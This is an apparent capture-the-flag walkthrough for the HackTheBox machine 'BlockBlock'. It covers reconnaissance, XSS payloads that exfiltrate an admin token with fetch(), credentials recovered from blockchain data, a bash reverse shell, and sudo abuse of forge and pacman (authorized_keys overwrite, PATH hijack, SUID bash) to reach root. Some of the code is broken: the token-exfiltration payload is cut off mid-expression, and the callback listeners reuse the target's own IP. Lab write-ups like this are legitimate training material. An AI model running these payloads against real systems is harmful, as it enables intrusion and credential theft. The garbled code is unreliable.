Beginner’s Guide to Conquering BlockBlock on HackTheBox

Key Highlights

• BlockBlock is a challenging cybersecurity training ground on HackTheBox, ideal for sharpening ethical hacking skills.
• This guide provides a comprehensive walkthrough for beginners, covering everything from initial setup to obtaining root access.
• Mastering BlockBlock equips you with practical knowledge of web application vulnerabilities, privilege escalation techniques, and penetration testing methodologies.
• Successfully compromising this machine demonstrates your ability to think critically and apply your skills to real-world scenarios.
• Throughout your journey, remember that perseverance and continuous learning are paramount in cybersecurity.

Introduction

In the ever-evolving landscape of cybersecurity, practical experience is paramount. HackTheBox provides a safe and legal environment for enthusiasts to hone their skills, and BlockBlock stands out as an excellent app for beginners to test their mettle. This beginner’s guide aims to provide a clear roadmap for conquering BlockBlock, empowering you with the knowledge and confidence to tackle progressively challenging cybersecurity scenarios.

Understanding BlockBlock on HackTheBox

Before we dive into the trenches, it’s essential to understand the nature of BlockBlock and its significance for aspiring cybersecurity professionals. This section will explore BlockBlock’s unique challenges and explain why it’s a worthwhile endeavor for those starting their cybersecurity journey.

What is BlockBlock?

BlockBlock is a virtual machine hosted on the HackTheBox platform, designed to simulate a real-world computer system vulnerable to various cyberattacks. It presents a series of challenges that require you to leverage your knowledge of networking, web apps, operating systems, and cybersecurity principles to gain access to the system and ultimately achieve “root” access – the highest level of privilege.

Imagine BlockBlock as a locked house with multiple security flaws. Your goal is to act as an ethical hacker, exploiting those vulnerabilities to gain entry and eventually take complete control of the house. Each step in conquering BlockBlock mimics the stages of a real-world penetration testing engagement.

Why is it Important for Beginners to Tackle BlockBlock?

Tackling BlockBlock as a beginner offers several benefits. Firstly, it provides a hands-on, practical application of theoretical cybersecurity concepts. Instead of merely reading about vulnerabilities, you’ll actively exploit them, solidifying your understanding.

Secondly, BlockBlock helps develop critical thinking and problem-solving skills essential for a cybersecurity career. You’ll face roadblocks along the way, requiring you to think creatively and strategically to find solutions.

Lastly, successfully compromising BlockBlock instills a sense of accomplishment and boosts your confidence in tackling increasingly complex cybersecurity challenges. It proves that with dedication and perseverance, you can break into the exciting world of ethical hacking.

Preparing to Conquer BlockBlock

Now that we understand the significance of BlockBlock, let’s prepare for the challenge. Adequate preparation is crucial for success in any cybersecurity endeavor, and this section will guide you through setting up the necessary tools, resources, and mindset.

Essential Tools and Resources Needed

To embark on your BlockBlock conquest, you will need a few essential tools readily available online:

• Virtual Machine Software: VirtualBox or VMware Workstation Player (free for personal use).
• Kali Linux Virtual Machine: A Debian-based Linux distribution specifically pre-configured with a vast array of penetration testing tools.
• A HackTheBox Account: Sign up for a free account on the HackTheBox platform to access the BlockBlock machine.

These resources form the foundation of your ethical hacking toolkit and will be instrumental throughout your journey.

Setting Up Your Environment for Success

Begin by installing your chosen virtual machine software and then set up your Kali Linux virtual machine. Once Kali is up and running, ensure that it’s connected to the internet within your virtual machine settings.

Next, ensure that you can access HackTheBox machines from your Kali VM. This might involve configuring your network settings to connect through HackTheBox’s VPN or using their web-based access.

Finally, familiarize yourself with the basic Linux commands and the tools available within Kali Linux. A solid grasp of these fundamentals will be essential as we progress through the exploitation stages.

ALSO READ: Mastering Administrator: Beginner’s Guide from HackTheBox

Gathering Initial Information

Before attempting any attacks, it’s crucial to gather as much information as possible about the target system. This process is known as reconnaissance. Begin by performing a port scan using a tool like Nmap to identify open ports and services running on BlockBlock.

Command	Description	Example
nmap -sV -sC -A	Perform a comprehensive scan of the target	nmap -sV -sC -A 10.10.10.10

Analyze the Nmap output to pinpoint potential vulnerabilities. For example, an open SSH port might indicate an older version susceptible to known exploits. Additionally, explore the website, if available, to identify web application vulnerabilities.

NMap Output

NMap Scan REsult INTERPRETATION

1. General Information

• Target IP: 10.129.179.129
• Host Status: The host is up, with a latency of 0.089 seconds.
• Scan Details:
  • All 65535 TCP ports were scanned.
  • 65532 ports are closed (reset).
  • Three ports are open: 22 (SSH), 80 (HTTP), and 8545 (Unknown).

---

2. Open Ports

Port 22 (SSH)

• Service: OpenSSH 9.7 (Protocol 2.0).
• Host Key Fingerprints:
  • ECDSA: d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73
  • ED25519: f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92
• Interpretation:
  • The system is running an SSH server for secure shell access.
  • The version, OpenSSH 9.7, is relatively recent. This might reduce the likelihood of known vulnerabilities, but further testing is required to confirm.

---

Port 80 (HTTP)

• Service: HTTP server running Werkzeug 3.0.3 on Python 3.12.3.
• HTTP Response Highlights:
  • Server Header: Werkzeug/3.0.3 Python/3.12.3.
  • Allow Headers: Content-Type, Authorization.
  • Allow Methods: GET, POST, PUT, DELETE, OPTIONS.
  • Access-Control Policy:
    • Origin: http://0.0.0.0/ (default open origin, a potential security misconfiguration).
• Pages and Errors:
  • /: The homepage titled “Home – DBLC” is available.
  • A 500 Internal Server Error was returned for HTTP OPTIONS, indicating a possible misconfiguration or backend error.
• Interpretation:
  • The server is likely hosting a web application.
  • The tools (Werkzeug) and language (Python) are commonly used for development and debugging environments, suggesting this might not be a production server.
  • The error messages and open methods (e.g., PUT) could provide opportunities for further exploration, such as:
    • Testing for vulnerabilities like directory traversal or unauthorized file uploads.
    • Analyzing the /assets/nav-bar.css file for potential information leakage.

---

Port 8545 (Unknown)

• Service: Likely a custom or lesser-known application using HTTP, as suggested by the following:
  • Bad Request: Returns HTTP 400 for invalid syntax.
  • Methods Allowed: OPTIONS, GET, POST, HEAD.
  • Access-Control Policy: Open to all origins (*), which is a potential security concern.
  • Error Messages:
    • Misinterpreted HTTP syntax (e.g., “HELP”) and unsupported methods (e.g., RTSP/1.0).
• Interpretation:
  • The port is running an HTTP service but does not conform to typical HTTP behavior.
  • Could be:
    • An Ethereum JSON-RPC endpoint, as 8545 is the default port for Ethereum clients (confirm by testing JSON-RPC payloads like eth_blockNumber).
    • A custom web or API server.

---

3. Observations and Next Steps

Host Security Observations

1. SSH: Likely secured with modern cryptographic algorithms. Test for weak authentication methods (e.g., brute force).
2. HTTP (Port 80):
   • The inclusion of PUT in the allowed methods is unusual and should be tested for file upload vulnerabilities.
   • Error pages might reveal sensitive information about the server or application configuration.
   • The open origin policy (Access-Control-Allow-Origin: *) is a potential security concern.
3. Unknown Service (Port 8545):
   • Check for specific service running on this port.
   • Test for known vulnerabilities in Ethereum JSON-RPC endpoints, if applicable.
   • Probe with common HTTP fuzzing techniques for valid endpoints or commands.

Web Application Analysis

After registering an account, we gain access to the chat functionality. The application has several key features:

• A chat interface where users can send messages
• A “Report User” function
• Smart contracts viewable through an API endpoint

The application uses JWT tokens for authentication, stored in an HttpOnly cookie named token. The site makes periodic calls to /api/recent_messages to fetch chat messages and to port 8545 for blockchain-related operations.

Two Solidity smart contract files are available through the API:

• Database.sol: Manages user accounts with functions for registration and password management
• Chat.sol: Handles chat messages using the Database contract for authentication

Exploiting XSS to Gain Admin Access

The “Report User” functionality is vulnerable to cross-site scripting (XSS). When a user is reported, their message is rendered without proper sanitization to an admin user.

Testing with a simple HTML payload confirms the vulnerability:

<img src="http://10.129.179.129/img.png" />

This results in a request to our server, confirming the HTML injection. We can then leverage this to execute JavaScript:

<img src="x" onerror="fetch('http://10.129.179.129/xss')" />

Since the JWT token is HttpOnly, we can’t directly access it via JavaScript. However, we discovered an API endpoint /api/info that returns the current user’s token. We can exploit this to exfiltrate the admin’s token:

 resp.text()).then(body => { fetch('http://10.129.179.129/exfil', { method: 'POST', body: body});})" />

This successfully retrieves the admin’s token, which we can then use to access the admin panel at /admin.

Blockchain Exploitation

Interacting with the Ethereum RPC

The admin panel reveals additional functionality for interacting with the blockchain. The application makes calls to /api/chat_address to get a blockchain address, followed by calls to /api/json-rpc with the Ethereum JSON-RPC method eth_getBalance.

We can use the eth_getBlockByNumber method to retrieve raw blocks from the blockchain:

{"jsonrpc":"2.0","method":"eth_getBlockByNumber","params":["latest",true],"id":1}

Since there are only 16 blocks (0x0 to 0xf), we can systematically examine each one. In block 0x01, we find interesting data in the input field that decodes to reveal a username “keira” and a password “SomedayBitCoinWillCollapse”.

SSH Access as keira

Using the credentials discovered in the blockchain, we can establish an SSH connection as the user keira:

ssh keira@10.129.179.129

This gives us access to the user flag.

Privilege Escalation to paul

Examining Permissions

The system is running Arch Linux. There are two users with home directories: keira and paul. Checking sudo permissions reveals that keira can run the forge command as paul without a password:

sudo -l
User keira may run the following commands on blockblock:
(paul : paul) NOPASSWD: /home/paul/.foundry/bin/forge

Exploiting forge

forge is part of the Foundry toolkit for Ethereum application development. There are multiple ways to exploit this for privilege escalation:

Method 1: Using the build command with –use

The build command has a --use option that allows specifying a binary to use as the compiler. We can create a reverse shell script and execute it:

echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.129.179.129/443 0>&1' | tee shell.sh
chmod +x shell.sh
sudo -u paul /home/paul/.foundry/bin/forge build --use ./shell.sh

Method 2: Using the flatten command for file operations

The flatten command can read and write files. We can use this to write our SSH public key to paul’s authorized_keys file:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing" > pub
sudo -u paul /home/paul/.foundry/bin/forge flatten pub -o /home/paul/.ssh/authorized_keys

Method 3: Exploiting relative path execution

The forge command calls git using a relative path. We can create a malicious git script in the current directory and manipulate the PATH:

cp shell.sh git
sudo -u paul PATH=.:$PATH /home/paul/.foundry/bin/forge build

Privilege Escalation to root

Examining Permissions

The user paul can run pacman (the Arch Linux package manager) as any user without a password:

sudo -l
User paul may run the following commands on blockblock:
(ALL : ALL) NOPASSWD: /usr/bin/pacman

Exploiting pacman

There are multiple ways to exploit pacman for privilege escalation:

Method 1: File write in package()

We can create a custom package that writes our SSH public key to root’s authorized_keys file:

pkgname=tcsg
pkgver=1
pkgrel=1
pkgdesc="privesc"
url=https://thecybersecguru.com
source=("pub")
arch=("x86_64")
license=("GPL2")
build() {
  echo "privsec"
}
package() {
  install -Dm755 "$srcdir/pub" "$pkgdir//root/.ssh/authorized_keys"
}

After creating the package with makepkg --skipinteg, we can install it with:

sudo /usr/bin/pacman -U tcsg-1-1-x86_64.pkg.tar.zst

This gives us SSH access as root.

Alternatively, we could create a SetUID/SetGID copy of bash:

package() {
  install -Dm6777 -o root -g root "/bin/bash" "$pkgdir//var/tmp/0xdf"
}

Note that we use /var/tmp because /dev/shm and /tmp are mounted with nosuid.

Method 2: Using install scripts

Pacman packages can include install scripts that run during installation, which could be used to execute commands as root.

Method 3: Using –hookdir

The --hookdir option in pacman could potentially be exploited to run custom hooks during package installation.

ALSO READ: Mastering University: Beginner’s Guide from HackTheBox

Conclusion

In conclusion, conquering BlockBlock on HackTheBox is a rewarding challenge for beginners in cybersecurity. Understanding the fundamentals and having the right tools and resources are crucial for success. By setting up your environment strategically and gathering initial information, you can navigate through BlockBlock effectively. Remember, practice and patience are key in mastering this task. Embrace the learning process and enjoy the journey of enhancing your cybersecurity skills. For more expert tips and insights, don’t forget to subscribe for the latest updates and tutorials. Happy hacking!

Frequently Asked Questions

What are the prerequisites for attempting BlockBlock?

A basic understanding of networking, Linux command-line usage, and web app concepts is recommended. Familiarity with cybersecurity fundamentals will be beneficial, although not strictly mandatory, as this guide aims to guide beginners through the process. Preparation is key to overcoming BlockBlock’s challenges and solidifying your skills.

How long does it typically take to complete BlockBlock for a beginner?

The time to complete BlockBlock varies depending on your prior experience with cybersecurity apps and problem-solving skills. Some beginners might take a few hours, while others could take a couple of days. The crucial aspect is to maintain a consistent learning pace and not get discouraged by roadblocks.

Are there any specific tools or techniques that are helpful for conquering BlockBlock on HackTheBox?

While this guide provides a solid foundation, specific tools and techniques for success might vary. Leverage online resources, cybersecurity forums, and communities like the HackTheBox Discord server for hints, tips, and different perspectives.